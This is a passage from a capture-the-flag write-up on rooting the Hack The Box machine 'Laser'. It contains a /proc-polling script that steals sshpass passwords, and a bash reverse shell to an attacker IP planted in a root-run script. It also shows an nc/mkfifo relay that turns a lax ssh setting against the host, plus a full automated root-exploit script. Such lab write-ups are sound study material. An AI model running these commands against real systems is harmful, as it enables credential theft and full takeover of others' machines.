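For the curious, a rough, hypothetical sketch of how one might win the race deliberately instead of waiting for pspy to get lucky - polling /proc for sshpass command lines before the password argument is scrubbed:

#!/usr/bin/env python3
# Hypothetical sketch: repeatedly read /proc/*/cmdline and print any sshpass
# password argument caught before sshpass overwrites it with 'z' characters.
import glob, time

seen = set()
while True:
    for path in glob.glob('/proc/[0-9]*/cmdline'):
        try:
            with open(path, 'rb') as f:
                argv = f.read().split(b'\x00')
        except OSError:
            continue  # process exited between listing and reading
        if argv and b'sshpass' in argv[0] and b'-p' in argv:
            idx = argv.index(b'-p') + 1
            if idx < len(argv):
                pw = argv[idx]
                # sshpass masks the argument with 'z's; only report unmasked catches
                if pw.strip(b'z') and pw not in seen:
                    seen.add(pw)
                    print('Caught password:', pw.decode(errors='replace'))
    time.sleep(0.001)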
However, I think that this can be used to progress.
Let's try to ssh in over the unstable nc reverse shell first, just to see if it works.
solr@laser:/opt/solr/server$ sshpass -p c413d115b3d87664499624e7826d8c5a ssh root@172.18.0.2
Pseudo-terminal will not be allocated because stdin is not a terminal.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-42-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
ls
feeds
pwd
/root
whoami
root
Cool?
So, the host system is connecting over ssh into this container, every 10 seconds.
What if I used the root access on the container to trick the host system into sending the ssh connection somewhere else?
That wouldn't generally be possible. Default ssh settings check the host key upon connection, in order to confirm that the host is the exact host expected as per prior connections.
Let's check the uncommented lines in the configuration anyway.
solr@laser:~/.ssh$ sed -n '/^[^#]/p' /etc/ssh/ssh_config
Include /etc/ssh/ssh_config.d/*.conf
Host *
SendEnv LANG LC_*
HashKnownHosts yes
GSSAPIAuthentication yes
StrictHostKeyChecking no
solr@laser:~/.ssh$
Critically, StrictHostKeyChecking is disabled! How convenient. And how lucky I am to have checked this before getting stuck in a different rabbit hole.
When StrictHostKeyChecking is set to no, host keys are not checked upon connecting, and are added automatically to the ~/.ssh/known_hosts file. This is considered insecure by NASA (and everyone else). With this setting, an ssh man-in-the-middle attack is easily possible.
In this case, the implication is that I am able to redirect the connection to another host. For instance, I can use pipes to create a mirror, and cause the host to connect to... itself! Cute.
Stop Authenticating Yourself!
Returning ssh To Sender
This is only possible because the ssh key for root is, in this configuration, both used by the host's root user, and accepted for authentication by the host's root user.
solr@laser:~$ ifconfig | grep inet -B1
br-3ae8661b394c: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 172.18.0.1 netmask 255.255.0.0 broadcast 172.18.255.255
inet6 fe80::42:47ff:fe9d:969e prefixlen 64 scopeid 0x20<link>
--
docker0: flags=4099<UP,BROADCAST,MULTICAST> mtu 1500
inet 172.17.0.1 netmask 255.255.0.0 broadcast 172.17.255.255
--
ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.201 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 dead:beef::250:56ff:feb9:d158 prefixlen 64 scopeid 0x0<global>
inet6 fe80::250:56ff:feb9:d158 prefixlen 64 scopeid 0x20<link>
The local bridge address 172.18.0.1 is the address of the host from the perspective of the docker container, as it has the same network part (172.18.0.0/16) as the container.
Notably, there is a copy of nc in the /tmp folder of the container. Helpful. We should be able to pipe the ssh connection around with that.
Editor's Note: two(!) separate copies of socat were lying around on the docker container when I was attacking. Please delete your tracks, people!
For reference, the relevant commands are replicated below. These are run by the host machine on the docker container through ssh.
scp /root/clear.sh /tmp/clear.sh
bash /tmp/clear.sh
rm /tmp/clear.sh
All are performed in quick succession, as they are picked up by pspy within the same second.
You would think that the file would be overwritten by the scp command every time. This is Linux though, and I am root... We can start by changing the file to read-only, and if that doesn't work, there may be an opportunity for some fancy ACLs such as setfacl -m u:root:r /tmp/clear.sh to block the overwrite.
Procedure
Firstly, I start an nc listener on my attacking host...
> nc -lvp 1337
listening on [any] 1337 ...
I now move to a user shell as solr on laser, using a simple chmod 555 to make the /tmp/clear.sh script read-only (r-xr-xr-x). This should do the trick, but I'll have to see whether it works out.
solr@laser:/opt/solr/server$ echo 'bash -i >& /dev/tcp/10.10.14.2/1337 0>&1 ' > /tmp/clear.sh
solr@laser:/opt/solr/server$ chmod 555 /tmp/clear.sh
solr@laser:/opt/solr/server$ sshpass -p c413d115b3d87664499624e7826d8c5a ssh root@172.18.0.2
Entering the docker container, I remove the ssh daemon's binding, use mkfifo to create a named pipe, and send incoming connections back out to the host. The piping technique was modified from the first example in a blog post about nc proxying.
kill -9 $(pgrep -f listener)
cd /tmp
mkfifo molzy
while true; do ./nc -l 22 0< ./molzy | ./nc 172.18.0.1 22 1> ./molzy; done
Editor's note: the first try was without the while loop. The pipe didn't stay connected, and I did not obtain the root shell.
We Have root.txt
In the new reverse shell:
connect to [10.10.14.2] from laser.htb [10.10.10.201] 37814
bash: cannot set terminal process group (2541141): Inappropriate ioctl for device
bash: no job control in this shell
root@laser:~# ls
clear.sh
feed.sh
reset.sh
root.txt
snap
update.sh
root@laser:~# whoami
root
root@laser:~# cat root.txt
32237fa...
Fantastic!
For a more reliable connection post-exploitation, there is a fixed ssh key present in /root/.ssh/id_rsa.
Life After Root
Copying Scripts
I proceeded to download the ssh key, and scp -r the /root directory and the /opt directory, for later fun and analysis.
> scp -r -i id_rsa root@laser.htb:/root root
load pubkey "id_rsa": invalid format
241e69162522ccf5846a2f42ebc24b17464915a155679666b89a9f31 100% 72 2.6KB/s 00:00
#--[[snip]]--
> scp -r -i id_rsa root@laser.htb:/opt opt
load pubkey "id_rsa": invalid format
commons-lang3-3.8.1.jar 100% 490KB 2.8MB/s 00:00
#--[[snip]]--
It turned out that /opt contained two copies of Apache Solr, weighing in at 200MB each - don't repeat my mistake if you are on a low-bandwidth connection!
The scripts that have been running in the background were mostly found in /root, with the exception of /opt/updates/run.sh, which was only used to make the sshpass race condition more common.
Where Was The Crontab?
The aforementioned scripts were not listed in /etc/crontab or similar - they ended up being in /var/spool/cron/crontabs/root!
root@laser:/var/solr# cat /var/spool/cron/crontabs/root
# DO NOT EDIT THIS FILE - edit the master and reinstall.
# (/tmp/crontab.Hv26Fi/crontab installed on Tue Aug 4 06:55:22 2020)
# (Cron version -- $Id: crontab.c,v 2.13 1994/01/17 03:20:37 vixie Exp $)
# Edit this file to introduce tasks to be run by cron.
# --[[snip]]--
# m h dom mon dow command
@reboot /root/feed.sh
*/5 * * * * docker stop laser && docker start laser && docker exec laser service ssh restart
* * * * * rm /opt/printer/logs/*.log
* * * * * /root/update.sh
*/3 * * * * /root/reset.sh
* * * * * rm /var/solr/logs/*
/opt/printer/printer.py is the printer server, and it is quite neat to read through.
Auto-Root Script
I created a quick bash script which uses the steps documented above, including the solr.py script, to automatically gain a reverse shell as the root user.
#!/usr/bin/env bash
# attacking host ip address
ipadd=$(ip addr | grep -o "10.10.14.[^/]*")
# gain reverse shell as the solr user, async
python3 solr.py > /dev/null &disown
# create and trigger reverse shell as root through docker
# container located at 172.18.0.2, async
echo "
echo 'bash -i >& /dev/tcp/${ipadd}/1337 0>&1 ' > /tmp/clear.sh
chmod 555 /tmp/clear.sh
sshpass -p c413d115b3d87664499624e7826d8c5a ssh root@172.18.0.2
kill -9 \$(pgrep -f listener)
mkfifo /tmp/molzy
while true; do /tmp/nc -l 22 0< /tmp/molzy | /tmp/nc 172.18.0.1 22 1> /tmp/molzy; done
exit
" | nc -lvp 4444 > /dev/null &disown
# wait for the reverse shell as root to connect
nc -lvp 1337
Running the script provides the following reverse shell connection within a minute:
> ./root.sh
listening on [any] 1337 ...listening on [any] 4444 ...
10.10.10.201 - - [xx/xxx/2020 xx:xx:xx] "GET /ex.sh HTTP/1.1" 200 -
10.10.10.201 - - [xx/xxx/2020 xx:xx:xx] "GET /ex.sh HTTP/1.1" 200 -
connect to [10.10.14.28] from laser.htb [10.10.10.201] 49020
connect to [10.10.14.28] from laser.htb [10.10.10.201] 50604
bash: cannot set terminal process group (277095): Inappropriate ioctl for device
bash: no job control in this shell
root@laser:~# id && hostname && wc -c /root/root.txt
uid=0(root) gid=0(root) groups=0(root)
laser
33 /root/root.txt
root@laser:~#
Well done to the box authors on a fulfilling and enjoyable breaking-and-entering experience!